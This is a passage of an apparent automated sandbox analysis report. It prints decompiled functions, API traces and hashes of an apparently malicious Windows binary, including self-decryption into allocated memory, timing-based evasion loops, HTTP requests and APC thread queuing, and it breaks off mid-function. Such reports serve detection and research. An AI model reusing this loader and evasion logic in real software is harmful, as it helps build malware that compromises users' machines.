Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
GetProcAddress.KERNEL32(00000000,?), ref: 00401046
GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
GetProcAddress.KERNEL32(00000000,?), ref: 00401072
GetProcAddress.KERNEL32(00000000,?), ref: 00401088
GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 00401C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401CED
Part of subcall function 00401C90: memset.NTDLL ref: 00401D0F

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: b071192780d30fa37d270c9a6f49c8fb865145641f62670ffd03f1ccc65f9e0a
Instruction ID: 9140f5516d8f6e96bc42ac16d424ff358ba4bbc2604748eb03e792c2eb0f4ca6
Opcode Fuzzy Hash: b071192780d30fa37d270c9a6f49c8fb865145641f62670ffd03f1ccc65f9e0a
Instruction Fuzzy Hash: 0F21BBB060064AAFD710DF6ACD84D6BBBFCEF54344700043AE649EB260DB74EA018F28

Uniqueness

Uniqueness Score: -1.00%

Function 03C42789, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E03C42789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x3c4d238 = _t10;
				if(_t10 != 0) {
					 *0x3c4d1a8 = GetTickCount();
					_t12 = E03C49EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L03C4B0CA();
							_t34 = _t14 + _t16;
							_t18 = E03C4122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E03C44D4D(_t26) != 0) {
							 *0x3c4d260 = 1; // executed
						}
						_t12 = E03C42F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x03c42789
0x03c4278f
0x03c42790
0x03c4279c
0x03c427a2
0x03c427a9
0x03c427b9
0x03c427be
0x03c427c5
0x03c427c7
0x03c427cc
0x03c427d2
0x03c427d8
0x03c427e2
0x03c427e6
0x03c427e8
0x03c427ed
0x03c427ee
0x03c427ef
0x03c427f4
0x03c427fa
0x03c42805
0x03c42806
0x03c4280c
0x03c42812
0x03c4281e
0x03c42820
0x03c42820
0x03c4282a
0x03c4282a
0x03c427ab
0x03c427ad
0x03c427ad
0x03c42834

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,03C47F25,?), ref: 03C4279C
GetTickCount.KERNEL32 ref: 03C427B0
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,03C47F25,?), ref: 03C427CC
SwitchToThread.KERNEL32(?,00000001,?,?,?,03C47F25,?), ref: 03C427D2
_aullrem.NTDLL(?,?,00000013,00000000), ref: 03C427EF
Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,03C47F25,?), ref: 03C4280C

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: c45995128903418a266dccadc3e018cc1cc01e07d73604e75ae45dd6fff2496a
Instruction ID: 2d53b3108feb795632133e0e44ff081811794b02cead32368043e03fb7643d9d
Opcode Fuzzy Hash: c45995128903418a266dccadc3e018cc1cc01e07d73604e75ae45dd6fff2496a
Instruction Fuzzy Hash: 6311E57BA403007BE324FBB4DC1EB5A7AACDB44350F054529F906CB2D4EBB0ED408660

Uniqueness

Uniqueness Score: -1.00%

Function 03C497F7, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C497F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E03C48CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E03C4A85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x03c497f7
0x03c49804
0x03c49806
0x03c49869
0x00000000
0x03c49869
0x03c4981e
0x03c49825
0x03c49831
0x03c49836
0x03c4984c
0x03c4985c
0x00000000
0x03c4984e
0x03c4984e
0x03c49855
0x03c49862
0x03c49862
0x03c49862
0x03c49855
0x03c4984c
0x03c49867
0x00000000
0x00000000
0x03c4986d

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,03C4937B,?,?,00000000,00000000), ref: 03C49831
ResetEvent.KERNEL32(?), ref: 03C49836
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 03C49843
GetLastError.KERNEL32 ref: 03C4984E
GetLastError.KERNEL32(?,?,00000102,03C4937B,?,?,00000000,00000000), ref: 03C49869

Part of subcall function 03C48CFA: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,03C49816,?,?,?,?,00000102,03C4937B,?,?,00000000), ref: 03C48D06
Part of subcall function 03C48CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03C49816,?,?,?,?,00000102,03C4937B,?), ref: 03C48D64
Part of subcall function 03C48CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 03C48D74

SetEvent.KERNEL32(?), ref: 03C4985C

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID:
API String ID: 3739416942-0
Opcode ID: 05df7ffa10f550437c7aeb8d600584091dd3478d3362efdec1fe6ac3b6e8be9b
Instruction ID: fe13fc687a6b5d112fcdc700ff39f5e68a2173bb7f546da6a769706c72be3f8d
Opcode Fuzzy Hash: 05df7ffa10f550437c7aeb8d600584091dd3478d3362efdec1fe6ac3b6e8be9b
Instruction Fuzzy Hash: 24016D36101320ABDB31AB3ADC44F1BBAACEF44378F154A25F552D90E0D732DD15EA61

Uniqueness

Uniqueness Score: -1.00%

Function 004197B7, Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

__CrtCheckMemory.LIBCMTD ref: 004197DA
__heap_alloc_base.LIBCMTD ref: 00419967
_memset.LIBCMT ref: 00419AB5
_memset.LIBCMT ref: 00419AD2
_memset.LIBCMT ref: 00419AED

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset$CheckMemory__heap_alloc_base
String ID:
API String ID: 4254127243-0
Opcode ID: 0ed41d0a78ef98ae619d4450501c923431563c3941c69cd1aca692f4135d9167
Instruction ID: 59d498dfd4cf6e8f47dc0b4b071b4ae45408b2f4f593a52414d8bbd927d4cc9b
Opcode Fuzzy Hash: 0ed41d0a78ef98ae619d4450501c923431563c3941c69cd1aca692f4135d9167
Instruction Fuzzy Hash: E8B1BC70A00205DFDB14CF44D991BDA77F0BB48304F24816AE9196B391D379AE81CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 03C42F70, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E03C42F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E03C459A4();
				if(_t21 != 0) {
					_t59 =  *0x3c4d25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x3c4d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x3c4d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E03C42B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x3c4d2a8; // 0xb0a5a8
					if( *0x3c4d25c > 5) {
						_t8 = _t26 + 0x3c4e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x3c4e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E03C49154(_t27, _t27);
					_t31 = E03C48E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x3c4d270 =  *0x3c4d270 ^ 0x81bbe65d;
						_t32 = E03C41525(0x60);
						 *0x3c4d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x3c4d32c; // 0x47595b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x3c4d32c; // 0x47595b0
							 *_t51 = 0x3c4e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x3c4d238, 0, 0x43);
							 *0x3c4d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x3c4d25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x3c4d2a8; // 0xb0a5a8
								_t13 = _t58 + 0x3c4e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x3c4c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E03C47A2E( ~_v8 &  *0x3c4d270, 0x3c4d00c); // executed
								_t42 = E03C47FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E03C450E8(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E03C47C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E03C446B2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x3c4d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E03C48B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x03c42f70
0x03c42f7b
0x03c42f7e
0x03c42f81
0x03c42f84
0x03c42f8b
0x03c42f8d
0x03c42f99
0x03c42f9b
0x03c42f9b
0x03c42fa4
0x03c42faa
0x03c42faf
0x03c42fc9
0x03c42fd5
0x03c42fd7
0x03c42fdc
0x03c42fe6
0x03c42fe6
0x03c42fde
0x03c42fde
0x03c42fde
0x03c42fde
0x03c42fed
0x03c42ffa
0x03c43001
0x03c43006
0x03c43006
0x03c4300e
0x03c43011
0x03c43037
0x03c43043
0x03c43048
0x03c4304d
0x03c4304f
0x03c4307b
0x03c4307d
0x03c43051
0x03c43055
0x03c4305a
0x03c4305f
0x03c43066
0x03c4306c
0x03c43071
0x03c43077
0x03c4307e
0x03c43080
0x03c43082
0x03c43091
0x03c43097
0x03c4309c
0x03c4309e
0x03c430ce
0x03c430d0
0x03c430a0
0x03c430a0
0x03c430a6
0x03c430b3
0x03c430b9
0x03c430b9
0x03c430c1
0x03c430ca
0x03c430d1
0x03c430d3
0x03c430d5
0x03c430dc
0x03c430e9
0x03c430ee
0x03c430f3
0x03c430f5
0x03c430f7
0x00000000
0x00000000
0x03c430f9
0x03c430fe
0x03c43100
0x03c43107
0x03c4310b
0x03c4310e
0x03c43123
0x03c43127
0x03c4312c
0x00000000
0x03c4312c
0x03c43110
0x03c43112
0x00000000
0x00000000
0x03c4311d
0x03c4311f
0x03c43121
0x00000000
0x00000000
0x00000000
0x03c43121
0x03c43104
0x03c43104
0x03c430d5
0x03c43013
0x03c43013
0x03c43018
0x03c4312e
0x03c43132
0x03c4313a
0x03c4313a
0x00000000
0x03c43132
0x03c4301e
0x03c43021
0x03c4302b
0x03c43032
0x00000000
0x03c43142
0x03c43142
0x03c43146
0x03c4314a
0x03c4314a

APIs

Part of subcall function 03C459A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,03C42F89,00000000,00000000), ref: 03C459B3

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 03C43006

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

memset.NTDLL ref: 03C43055
RtlInitializeCriticalSection.NTDLL(04759570), ref: 03C43066

Part of subcall function 03C446B2: memset.NTDLL ref: 03C446C7
Part of subcall function 03C446B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 03C44709
Part of subcall function 03C446B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 03C44714

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 03C43091
wsprintfA.USER32 ref: 03C430C1

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: b80f31bb7ee2f5470b6c33c1a7ccd2d7c78adc44b1397342094d060116ca925c
Instruction ID: 3c8136a9cd45a17f65a278618d0386d3ddbbf825c959a91ce84bee1b4788d955
Opcode Fuzzy Hash: b80f31bb7ee2f5470b6c33c1a7ccd2d7c78adc44b1397342094d060116ca925c
Instruction Fuzzy Hash: FF510F7CA00364ABDB21FBB1DC88B6EB7B8AB44710F194865E502EF245E7719E54CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03C42D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E03C42D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E03C41525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E03C48B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E03C41525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x3c4d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x03c42d7b
0x03c42d82
0x03c42d87
0x03c42d8a
0x03c42d91
0x03c42d94
0x03c42d97
0x03c42d9c
0x03c42da1
0x03c42ef5
0x03c42ef7
0x03c42ef9
0x03c42efe
0x03c42efe
0x03c42da7
0x03c42daa
0x03c42dad
0x03c42daf
0x03c42daf
0x03c42db3
0x00000000
0x00000000
0x03c42db7
0x03c42de3
0x03c42de8
0x03c42dea
0x03c42dea
0x03c42ded
0x03c42df0
0x03c42df0
0x03c42df2
0x00000000
0x03c42dbd
0x03c42dbf
0x03c42dde
0x03c42dde
0x03c42df5
0x03c42df5
0x03c42df6
0x03c42df6
0x03c42df9
0x00000000
0x00000000
0x00000000
0x03c42df9
0x03c42dc3
0x03c42e0a
0x03c42e0e
0x03c42ee8
0x03c42eea
0x03c42eea
0x03c42eeb
0x03c42eee
0x00000000
0x03c42eee
0x03c42e17
0x03c42e28
0x03c42e2c
0x03c42ee4
0x00000000
0x03c42ee4
0x03c42e32
0x03c42e35
0x03c42e39
0x03c42e3d
0x03c42e42
0x03c42eda
0x03c42eda
0x00000000
0x03c42ee0
0x03c42e4d
0x03c42e56
0x03c42e6a
0x03c42e71
0x03c42e86
0x03c42e8c
0x03c42e94
0x00000000
0x00000000
0x00000000
0x00000000
0x03c42e96
0x03c42e96
0x03c42e96
0x03c42e9d
0x03c42ea5
0x00000000
0x00000000
0x03c42ea7
0x03c42eb0
0x00000000
0x00000000
0x00000000
0x03c42eb2
0x03c42eb4
0x03c42eb7
0x03c42eb7
0x03c42eba
0x03c42ebe
0x03c42ec1
0x03c42ec7
0x03c42eca
0x03c42ed1
0x00000000
0x03c42e4d
0x03c42dc8
0x03c42dd0
0x03c42dd6
0x03c42dd8
0x03c42dd8
0x03c42ddb
0x03c42ddd
0x00000000
0x03c42ddd
0x03c42db7
0x03c42dfd
0x03c42e02
0x03c42e04
0x03c42e04
0x03c42e07
0x03c42e07
0x00000000

APIs

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

lstrcpy.KERNEL32(69B25F45,00000020), ref: 03C42E71
lstrcat.KERNEL32(69B25F45,00000020), ref: 03C42E86
lstrcmp.KERNEL32(00000000,69B25F45), ref: 03C42E9D
lstrlen.KERNEL32(69B25F45), ref: 03C42EC1

Strings

, xrefs: 03C42E0A

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: f6e86cdf17ebbfcad1bb74b8b52bf9ea8f7b78cf31d9b364dcbdf5e7505ae2bd
Instruction ID: ca54b75c77732aac3106d83ac83c6dd611d80dcf9044823efc105613568a78a9
Opcode Fuzzy Hash: f6e86cdf17ebbfcad1bb74b8b52bf9ea8f7b78cf31d9b364dcbdf5e7505ae2bd
Instruction Fuzzy Hash: 30518D31A00218EBCB21DF99C886BADFBB6FF59315F19845AE815DF215C770AB41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00401D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4030e0 = _t1;
				if(_t1 != 0) {
					 *0x4030f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004019A0(); // executed
					_t6 = _t4;
					HeapDestroy( *0x4030e0);
				}
				ExitProcess(_t6);
			}

0x00401d39
0x00401d42
0x00401d48
0x00401d4f
0x00401d58
0x00401d5d
0x00401d63
0x00401d6e
0x00401d70
0x00401d70
0x00401d77

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401D42
GetModuleHandleA.KERNEL32(00000000), ref: 00401D52
GetCommandLineW.KERNEL32 ref: 00401D5D

Part of subcall function 004019A0: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004019DF
Part of subcall function 004019A0: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A26
Part of subcall function 004019A0: GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401A55
Part of subcall function 004019A0: GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401A73
Part of subcall function 004019A0: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401A9D
Part of subcall function 004019A0: QueueUserAPC.KERNELBASE(004013C4,00000000,?,?,00000000), ref: 00401AB9

HeapDestroy.KERNEL32 ref: 00401D70
ExitProcess.KERNEL32 ref: 00401D77

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
String ID:
API String ID: 2501132232-0
Opcode ID: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
Instruction ID: 05a8c36faf6c528b4ee69dbfea55c2bb6b45a73a18d0234de67205c8428d1488
Opcode Fuzzy Hash: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
Instruction Fuzzy Hash: B5E0B6709027209BC3212F71AF0DB4B3E68BF057927044536F606F22B4D7B84500CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 03C48A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 03C48A76
SysAllocString.OLEAUT32(03C44BD8), ref: 03C48ABA
SysFreeString.OLEAUT32(00000000), ref: 03C48ACE
SysFreeString.OLEAUT32(00000000), ref: 03C48ADC

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 6ccf171757ec2c6fd5514c6a1205a690135a74b66d4b983617c53092efa132b2
Instruction ID: 830e1491f2c74099e1d70bdc3710d80dc4261a204225d08c226e3143c1152bf4
Opcode Fuzzy Hash: 6ccf171757ec2c6fd5514c6a1205a690135a74b66d4b983617c53092efa132b2
Instruction Fuzzy Hash: 7C310FB5900209EFCB05DF98D8C49AEBBB9FF48300B25846EF906DB251E7719A41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 004014AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004014AD(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x4030f0;
				_t46 = E00401B54(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x403100;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x4041a7; // 0x4041a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00401B1C(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x403100 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x004014b4
0x004014c4
0x004014c9
0x004014ce
0x004014e3
